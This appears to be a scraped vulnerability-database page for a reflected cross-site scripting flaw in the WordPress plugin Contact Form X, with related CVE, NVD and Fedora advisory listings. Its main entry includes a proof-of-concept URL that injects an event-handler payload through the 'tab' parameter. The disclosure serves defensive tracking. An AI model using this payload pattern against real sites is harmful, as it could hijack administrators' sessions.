Lucene search
WpvulndbWPEX-ID:C8D2DF75-D862-48E3-A747-680D7AFC53E7HistoryFeb 25, 2022 - 12:00 a.m.
Contact Form X < 2.4.1 - Reflected Cross-Site Scripting
2022-02-2500:00:00
wpvulndb
145
0.002 Low
EPSS
Percentile
52.7%
The plugin does not escape the tab parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue
https://example.com/wp-admin/options-general.php?page=contactformx&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//Related
wpvulndb
wpvulndb
Contact Form X < 2.4.1 - Reflected Cross-Site Scripting
2022-02-25 00:00:00
nvd
nvd
CVE-2022-25601
2022-03-11 18:15:40
cve
cve
CVE-2022-25601
2022-03-11 18:15:40
patchstack
patchstack
cnvd
cnvd
WordPress Contact Form X plugin cross-site scripting vulnerability
2022-03-15 00:00:00
prion
prion
Cross site scripting
2022-03-11 18:15:00
cvelist
cvelist
openvas
openvas
Fedora: Security Advisory for wordpress (FEDORA-2022-4b3079c1be)
2022-03-23 00:00:00
Fedora: Security Advisory for wordpress (FEDORA-2022-706aac2786)
2022-03-27 00:00:00
Fedora: Security Advisory for wordpress (FEDORA-2022-956b6078fb)
2022-03-23 00:00:00
fedora
fedora
[SECURITY] Fedora 34 Update: wordpress-5.8.4-1.fc34
2022-03-18 19:14:57
[SECURITY] Fedora 36 Update: wordpress-5.9.2-1.fc36
2022-03-26 15:47:44
[SECURITY] Fedora 35 Update: wordpress-5.9.2-1.fc35
2022-03-18 20:08:15